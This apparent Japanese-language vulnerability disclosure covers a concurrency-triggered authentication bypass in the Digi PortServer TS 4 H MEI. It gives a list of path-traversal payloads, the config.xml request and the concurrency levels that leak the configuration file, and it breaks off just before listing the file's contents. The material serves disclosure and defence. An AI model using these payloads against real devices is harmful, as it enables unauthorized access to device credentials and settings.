Digi PortServer TS 4 H MEI において、認証を必要としない負荷誘発型の認証バイパスが確認されました。これにより、有効な認証情報なしでローカルデバイス設定ファイルを取得することが可能です。同時リクエスト数が増加すると、認証チェックが完了する前にWebサーバーがファイル内容の配信を開始します。これは、認証チェック自体の明確なロジック欠陥ではなく、飽和した接続/リクエストキューを介してファイルハンドラにフォールスルーしている可能性が高いと考えられます。
テスト済みファームウェア: 82000747_V1 (2012年6月2日) および 82000747_AB (2025年9月4日)。
../../../../../../../
../../../../../../..
/../../../../../../../
/../../../../../../..
..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..
\..\..\..\..\..\..\..\..
..2f..2f..2f..2f..2f..2f..2f
..2f..2f..2f..2f..2f..2f..
4 2f..2f..2f..2f..2f..2f..2f..2f
2f..2f..2f..2f..2f..2f..2f..
/.\\./.\\./.\\./.\\./.\\./.\\./
..//..//..//..//..//
//..//..//..//..//..//
//..//..//..//..//..//
GET /FS/<ペイロード>/config.xml へのリクエストは通常 401 Unauthorized を返します。同じリクエストを低い並行性(1スレッド、1秒遅延)で送信すると、デバイスは認証前に一貫して正しくリクエストを拒否します。
並行性が増加すると(5、6、10、20の同時リクエストでテスト)、デバイスは断続的にHTTP/0.9レスポンス(ヘッダーなし、ボディのみ)を返し、config.xml の完全な内容を含むようになります — 認証チャレンジなしで配信されます。これは、ファームウェアのHTTPハンドラに固定のリクエスト処理容量があり、それを超えるとリクエストが認証チェックを完全にバイパスできることを示しています。
開示される設定ファイルには以下が含まれます: